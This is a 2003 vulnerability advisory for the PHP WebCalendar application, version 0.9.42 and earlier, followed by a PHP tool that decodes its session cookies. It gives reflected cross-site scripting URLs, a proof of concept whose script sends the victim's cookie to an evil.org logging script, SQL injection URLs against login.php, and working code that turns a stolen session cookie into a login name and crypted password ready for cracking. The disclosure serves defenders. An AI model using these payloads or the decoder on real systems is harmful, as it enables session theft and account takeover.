Webcalendar <= 0.9.42 http://webcalendar.sourceforge.net/ WebCalendar is a PHP application used to maintain a calendar for one or more persons Cross Site Scripting ======================================== Files (Mabe Others): ---------------------------- includes/js/colors.php Code Sniplet: [...] window.opener.document.prefform.<?php echo $color?>.value= color; [...] Exploit: --------------------------- http://www.host.name/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script> Files (Mabe Others): ------------------------- week.php Code sniplet: [...] echo html_for_add_icon ( date ( "Ymd", $days[$d] ), $time_h, $time_m, $user ); [...] Exploit: -------------------- http://www.host.name/webcalendar/week.php?user="><script>alert(document.cookie)</script> Files (Mabe Others): ------------------------- day.php month.php week_details.php view_l.php view_m.php view_t.php view_v.php view_w.php week_details.php Code Sniplet: [...] echo $eventinfo; [...] Exploit: ---------------- http://www.host.name/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> POC: ----------------- http://www.host.name/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js</script> "evilcode.js" <---------------> window.open('http://www.evil.org/cgi-bin/logcookie.cgi?'+document.cookie); <---------------> We can then use the code provided in the files includes/functions.php and includes/validate.php to decode the "webcalendar_session" hash taken from the cookie. PHP source to decode the hash should be attached. >From functions.php: <-----------------> // Extract a user's name from a session id // This is a lame attempt at security. Otherwise, users would be // able to edit their cookies.txt file and set the username in plain // text. <-----------------> Source: http://nocon.darkflame.net/CSS/decode.txt Demo: http://nocon.darkflame.net/CSS/decode.php Example: webcalendar_session=838ea889b26c9772819d709b826e7b8f926d; Hash: 838ea889b26c9772819d709b826e7b8f926d Decoded: Login: demo Passw: Mn7ggQrGTEpi2 We can then run a standard unix password cracking program on "Mn7ggQrGTEpi2" Potential SQL Injection: ============================ This seems to affect the view_t.php, view_w.php, view_v.php and maybee others. http://www.host.name/webcalendar/view_m.php?id=additional sql command If "magic quotes" is set to off, then login.php is also vulnerable. http://www.host.name/webcalendar/login.php?user='additional%20sqlcommand http://www.host.name/webcalendar/login.php?password='additional%20sql%20command ---------------------------------------------------------------------------------------- Author Contacted on: Tue, 29 Jul 2003 Response: From: Craig Knudsen <cknudsen@cknudsen.com> Subject: Re: Webcalendar Vulnerabilities The source of most of these security issues is the use of global variables, which seemed to be the way to back in PHP3. I've tried to maintain compatibility to PHP3, but I'm thinking it's not worth the security risks at this point. I will likely drop the use of global variables in one of the next couple of releases. In the mean time, I'll take a look at the issues you've listed here. Thanks. Craig Requested Update on: Tue, 2 Sep 2003 Response: NONE ---------------------------------------------------------------------------------------- Advisory: http://nocon.darkflame.net/CSS/Wecalendar.txt Addtional Resources: - WWW Security White Paper http://www.discover.co.uk/www-secuirity.html - Perl: http://www.developer.com/lang/article.php/861781 - PHP: http://www.phpadvisory.com/articles/view.phtml?ID=5 - SQL Injection: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf - HTML Code Injection and Cross-site scripting http://www.technicalinfo.net/papers/CSS.html - Google is your friend ;) http://www.google.com - nocon Date: Wed Sep 3 2003 http://nocon.darkflame.net/
<head> <title> Webcalendar Cookie Decode </title> </head> <form method=post action="<? echo $PHP_SELF ?>"> <table width="200" border="0" cellspacing="1" cellpadding="0" bgcolor="#000000"> <tr><td> <table width="100%" border="0" cellspacing="2" cellpadding="2" bgcolor="#FFFFFF"> <tr align="center"> <td colspan="2">Webcalendar Cookie Decode <br> <a href=http://nocon.darkflame.net/> http://nocon.darkflame.net/</a> <br><br> </td> </tr> <tr> <td><strong>Hash</strong></td> <td align="right"><input type="text" name="hash" size="60"></td> </tr> <tr> <td> </td> <td align="center"> <input type="submit" value="Decode"></td> </tr> </table> </td> </tr> </table> </form> <?php $encoded_login = $HTTP_POST_VARS['hash']; $offsets = array ( 31, 41, 59, 26, 54 ); function hextoint ( $val ) { if ( empty ( $val ) ) return 0; switch ( strtoupper ( $val ) ) { case "0": return 0; case "1": return 1; case "2": return 2; case "3": return 3; case "4": return 4; case "5": return 5; case "6": return 6; case "7": return 7; case "8": return 8; case "9": return 9; case "A": return 10; case "B": return 11; case "C": return 12; case "D": return 13; case "E": return 14; case "F": return 15; } return 0; } function decode_string ( $instr ) { global $offsets; $orig = ""; for ( $i = 0; $i < strlen ( $instr ); $i += 2 ) { $ch1 = substr ( $instr, $i, 1 ); $ch2 = substr ( $instr, $i + 1, 1 ); $val = hextoint ( $ch1 ) * 16 + hextoint ( $ch2 ); $j = ( $i / 2 ) % count ( $offsets ); $newval = $val - $offsets[$j] + 256; $newval %= 256; $dec_ch = chr ( $newval ); $orig .= $dec_ch; } return $orig; } $login_pw = split('\|', decode_string ($encoded_login)); $login = $login_pw[0]; $cryptpw = $login_pw[1]; echo "<b> Login:</b> $login <br>"; echo "<b> Passw:</b> $cryptpw <br>"; ?>